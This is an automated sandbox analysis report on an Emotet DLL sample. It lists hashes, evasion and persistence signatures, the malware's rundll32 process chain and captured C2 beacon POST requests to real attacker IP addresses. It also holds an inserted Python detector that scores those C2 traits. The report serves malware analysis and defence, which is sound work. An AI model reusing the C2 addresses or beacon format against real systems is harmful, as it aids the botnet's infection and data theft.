
Analysis Report v8iFmF7XPp

Overview

General Information

Sample Name: v8iFmF7XPp (renamed file extension from none to dll)
Analysis ID: 386403
MD5: 57c45087c4228b685f2ba1739033aa52
SHA1: 0dfcdc6a288fe0792363b55cfa0009343239f7e7
SHA256: 0ef921657a9c7d429c65e2a5b74a235b75b3f14d1a0781bc5b174472913c2902

Detection

Emotet
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 3876 cmdline: loaddll32.exe 'C:\Users\user\Desktop\v8iFmF7XPp.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 908 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\v8iFmF7XPp.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5076 cmdline: rundll32.exe 'C:\Users\user\Desktop\v8iFmF7XPp.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 576 cmdline: rundll32.exe C:\Users\user\Desktop\v8iFmF7XPp.dll,RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfjc\jojcnj.tmq',RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Qfjc\jklaa.dll',RunDLL 1AIAACAAAABRAGYAagBjAFwAagBvAGoAYwBuAGoALgB0AG0AcQAAAA== MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfjc\jojcnj.tmq',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ctxuywd\wutukq.pfb',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
              • rundll32.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vzwiovrtengiv\kqvcktqgbfib.iqj',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                • rundll32.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxwmb\jkpj.zgu',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                  • rundll32.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vtvnv\rgao.stw',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                    • rundll32.exe (PID: 6972 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tduzowfuyye\kwrnkagaoo.gjy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                      • rundll32.exe (PID: 7080 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Acjeqx\suoth.uea',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                        • rundll32.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vsbshgerbjleuww\jcxjttitojfdgx.izj',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                          • rundll32.exe (PID: 7152 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sxwlvdjt\gtruoro.fuy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                            • rundll32.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvrwkvknxaabriyw\pmfojithdcmeryt.srg',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                              • rundll32.exe (PID: 5556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Niikduolbedqywld\lkcbagravqkrfqh.nmi',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                • rundll32.exe (PID: 3924 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zoyzltjfgemqhsmn\vnkfptckelbvwlk.boa',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                  • rundll32.exe (PID: 488 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Livoial\pcccws.vji',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                    • rundll32.exe (PID: 5148 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iazkdtsnhfgqyu\kqzarazxjjgtp.ohz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                      • rundll32.exe (PID: 5180 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qrtvgntlq\jkzevdis.pdj',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 2992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2412 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5332 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2412 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5056 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1328 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5396 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4724 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6156 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6252 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.198543812.0000000004411000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.198440197.0000000004310000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.343393255.0000000003350000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.343444128.0000000003371000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.462653731.0000000002391000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.2390000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.4310000.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.2720000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.2720000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.3370000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 36.2.rundll32.exe.49f0000.1.unpack | Malware Configuration Extractor: Emotet
Multi AV Scanner detection for dropped file
Source: C:\Windows\SysWOW64\Qfjc\jklaa.dll | Virustotal: Detection: 74%
Source: C:\Windows\SysWOW64\Qfjc\jklaa.dll | Metadefender: Detection: 43%
Source: C:\Windows\SysWOW64\Qfjc\jklaa.dll | ReversingLabs: Detection: 86%
Multi AV Scanner detection for submitted file
Source: v8iFmF7XPp.dll | Virustotal: Detection: 79%
Source: v8iFmF7XPp.dll | Metadefender: Detection: 50%
Source: v8iFmF7XPp.dll | ReversingLabs: Detection: 88%
Machine Learning detection for sample
Source: v8iFmF7XPp.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_70332180 Sleep,Module32NextW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CryptStringToBinaryW,LocalFree,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_70335700 RegOpenKeyA,EncryptFileA,VirtualAlloc,Sleep,ExitProcess,
Source: v8iFmF7XPp.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_70348C1D FindFirstFileExA,

Networking:

C2 URLs / IPs found in malware configuration
Source: unknown | Network traffic detected: IP country count 31
Source: Joe Sandbox View | IP Address: 97.120.3.198
Source: Joe Sandbox View | ASN Name: HOSTER-KZ
Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
Source: Joe Sandbox View | ASN Name: BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN
Source: global traffic | HTTP traffic detected:
    POST /fevfu215h/qkkg/exml9v/txegp7e76u/ HTTP/1.1
    DNT: 0
    Referer: 167.71.148.58/fevfu215h/qkkg/exml9v/txegp7e76u/
    Content-Type: multipart/form-data; boundary=-------------wy44tK3dAXXHM
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 167.71.148.58:443
    Content-Length: 6564
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /bnl4xmkzrn1f8bjj9e/kox9ds79wzqntiit/a219nkda3nv0ln83dk/ingn8/w1sz8lqi2h4xevvf153/ HTTP/1.1
    DNT: 0
    Referer: 167.71.148.58/bnl4xmkzrn1f8bjj9e/kox9ds79wzqntiit/a219nkda3nv0ln83dk/ingn8/w1sz8lqi2h4xevvf153/
    Content-Type: multipart/form-data; boundary=----------------------v7ja694BxhvFduv6zU4WRC
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 167.71.148.58:443
    Content-Length: 6484
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown | TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown | TCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknown  HTTP traffic detected (request headers shown one per line, in the order captured):
                          POST /fevfu215h/qkkg/exml9v/txegp7e76u/ HTTP/1.1
                          DNT: 0
                          Referer: 167.71.148.58/fevfu215h/qkkg/exml9v/txegp7e76u/
                          Content-Type: multipart/form-data; boundary=-------------wy44tK3dAXXHM
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: 167.71.148.58:443
                          Content-Length: 6564
                          Connection: Keep-Alive
                          Cache-Control: no-cache
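The POST above carries several traits worth checking for programmatically: the sandbox could read the headers, so this was plaintext HTTP sent to TCP port 443; the Host is an IP literal; the Referer has no scheme and is simply the host followed by the request path, which no browser produces; the path is a chain of random lowercase segments; and the body is a multipart upload. The following is an added example (not code from the report or from the sample) that parses the captured request and scores those traits. SAMPLE_REQUEST is the request listed above re-assembled with CRLF line endings and a constructed placeholder body of the stated length; BENIGN_REQUEST is a constructed control; the indicator names and weights are this example's own heuristics, not a published rule.

```python
"""Parse a raw HTTP/1.x request and score Emotet-style C2 traits.

Added example. Weights and threshold are heuristics chosen for illustration;
the MSIE 7.0 / Trident/7.0 user agent is scored low on purpose because it is
also the IE11 compatibility-mode and urlmon default string on real hosts.
"""
import ipaddress
import re

# The request from the report, re-assembled with CRLF; body is a constructed
# placeholder (the real body is Emotet's encrypted beacon).
SAMPLE_REQUEST = (
    b"POST /fevfu215h/qkkg/exml9v/txegp7e76u/ HTTP/1.1\r\n"
    b"DNT: 0\r\n"
    b"Referer: 167.71.148.58/fevfu215h/qkkg/exml9v/txegp7e76u/\r\n"
    b"Content-Type: multipart/form-data; boundary=-------------wy44tK3dAXXHM\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; "
    b"Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
    b".NET CLR 3.5.30729)\r\n"
    b"Host: 167.71.148.58:443\r\n"
    b"Content-Length: 6564\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n" + b"A" * 6564
)

# Constructed control: an ordinary browser fetch by hostname on port 80.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

RANDOM_SEGMENT = re.compile(r"^[a-z0-9]{3,12}$")


def parse_request(raw):
    """Split a raw request into method, path, version, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def host_without_port(host):
    """'1.2.3.4:443' -> '1.2.3.4' (hostnames and IPv4 only; bracketed IPv6 not handled)."""
    return host.rsplit(":", 1)[0] if host.count(":") == 1 else host


def is_ip_literal(host):
    """True when the Host header names an IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host_without_port(host))
        return True
    except ValueError:
        return False


def score_request(raw, dst_port):
    """Return (total weight, [indicator names]) for the C2 traits found."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "")
    hits = []
    # The request parsed as plaintext, so if it went to 443 it was not TLS.
    if dst_port == 443:
        hits.append(("plaintext_http_on_443", 3))
    if host and is_ip_literal(host):
        hits.append(("host_is_ip_literal", 2))
    # Emotet sets Referer to host + path without a scheme; browsers never do.
    if h.get("referer") == host_without_port(host) + req["path"]:
        hits.append(("referer_mirrors_host_and_path", 3))
    segments = [s for s in req["path"].split("/") if s]
    if len(segments) >= 3 and all(RANDOM_SEGMENT.match(s) for s in segments):
        hits.append(("random_lowercase_path_segments", 2))
    if req["method"] == "POST" and h.get("content-type", "").startswith("multipart/form-data"):
        hits.append(("multipart_post", 1))
    ua = h.get("user-agent", "")
    if "MSIE 7.0" in ua and "Trident/7.0" in ua:
        hits.append(("legacy_msie7_trident7_ua", 1))
    return sum(w for _, w in hits), [name for name, _ in hits]


def is_c2_like(raw, dst_port, threshold=7):
    """Verdict helper: True when the weighted indicators reach the threshold."""
    total, _ = score_request(raw, dst_port)
    return total >= threshold


if __name__ == "__main__":
    print(score_request(SAMPLE_REQUEST, 443))   # (12, [six indicator names])
    print(score_request(BENIGN_REQUEST, 80))    # (0, [])
```

The Referer check is the most specific single indicator here because it reflects how the bot builds the request rather than what server it talks to, so it survives a C2 address change; the IP-literal Host and missing DNS lookup are cheaper to check but are also produced by legitimate software that pins addresses.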
                      Source: svchost.exe, 00000009.00000002.468110110.000002C419E89000.00000004.00000001.sdmp  String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: svchost.exe, 00000009.00000002.468110110.000002C419E89000.00000004.00000001.sdmp  String found in binary or memory: http://ocsp.digicert.com0:
                      Source: svchost.exe, 00000009.00000002.467760812.000002C419E14000.00000004.00000001.sdmp  String found in binary or memory: http://ocsp.msocsp.com0
                      Source: svchost.exe, 00000009.00000002.467432440.000002C419D60000.00000002.00000001.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: svchost.exe, 00000009.00000002.462704832.000002C4146AF000.00000004.00000001.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enum
                      Source: svchost.exe, 00000010.00000002.309488340.0000023697213000.00000004.00000001.sdmp  String found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmp  String found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmp  String found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmp  String found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmp  String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmp  String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000010.00000003.309202138.000002369725A000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000010.00000002.309538398.000002369724E000.00000004.00000001.sdmp  String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000010.00000002.309527175.0000023697242000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000010.00000002.309527175.0000023697242000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000010.00000003.309202138.000002369725A000.00000004.00000001.sdmp  String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmp  String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309551952.0000023697265000.00000004.00000001.sdmp  String found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmp  String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmp  String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmp  String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000010.00000002.309488340.0000023697213000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.309215409.0000023697240000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309517521.000002369723B000.00000004.00000001.sdmp  String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000010.00000002.309538398.000002369724E000.00000004.00000001.sdmp  String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknown  Network traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknown  Network traffic detected: HTTP traffic on port 443 -> 49735

                      E-Banking Fraud:

                      Yara detected Emotet
                      Source: Yara match  File source: 00000003.00000002.198543812.0000000004411000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000003.00000002.198440197.0000000004310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000005.00000002.343393255.0000000003350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000005.00000002.343444128.0000000003371000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000004.00000002.462653731.0000000002391000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 00000004.00000002.463337654.0000000002720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match  File source: 4.2.rundll32.exe.2390000.1.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 3.2.rundll32.exe.4310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 4.2.rundll32.exe.2720000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 4.2.rundll32.exe.2720000.2.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 5.2.rundll32.exe.3370000.2.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 5.2.rundll32.exe.3350000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 3.2.rundll32.exe.4310000.1.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 3.2.rundll32.exe.4410000.2.unpack, type: UNPACKEDPE
                      Source: Yara match  File source: 5.2.rundll32.exe.3350000.1.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 21_2_70335CE0 GetModuleFileNameW, PathFindFileNameW, OpenSCManagerW, OpenServiceW, DeleteService, CloseHandle, RegCreateKeyExW, RegDeleteValueW, CloseHandle, MoveFileW, ExitProcess
                      Source: C:\Windows\SysWOW64\rundll32.exe  File created: C:\Windows\SysWOW64\Qfjc\
                      Source: C:\Windows\SysWOW64\rundll32.exe  File deleted: C:\Windows\SysWOW64\Qfjc\jojcnj.tmq:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code functions (3_2): 100180F1, 10016156, 100129C7, 10013270, 10013A9C, 100172D6, 10016BDE, 1000D3FF, 1001367C, 1001669A, 10012E9C
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code functions (3_2): 04416C05, 04428978, 04414121, 0442C19B, 04424DAD, 04416E8A, 0441E360, 0441FB04, 04419716, 0442533C, 0442A7E4, 044183F0, 0441D04B, 0441884A, 04425060, 04420C65, 0441F471, 04421C79, 04414828, 044268CB, 0441B0E1, 0442D08F, 0442A094, 0441F099, 0441C8A5, 0442C95E, 04414D5F, 04415D0E, 04422513, 0441E924, 0441792C, 04425D36, 044239E1, 04418994, 0442B19F, 044181A0, 044159B8, 04427A50, 0441D668, 0441766F, 0441427A, 04428E79, 04422A7D, 04411600, 04423600, 04413618, 0441DEC9, 0441D2CE, 044212D1, 044276D5, 04429AE2, 04417AE4, 0442A2EA, 04420EA0, 044272AE, 044112B6, 04416ABA, 04416342, 04412746, 04423745, 04425748, 04418F55, 0441DB5B, 04425B60, 04420705, 04428313, 0441BB28, 0441C3C2, 044133F4, 0441B7F8, 0441EF80, 04413B97, 0441B3A2, 04413FAB, 044167AC, 0442CBB0, 0441FFB5
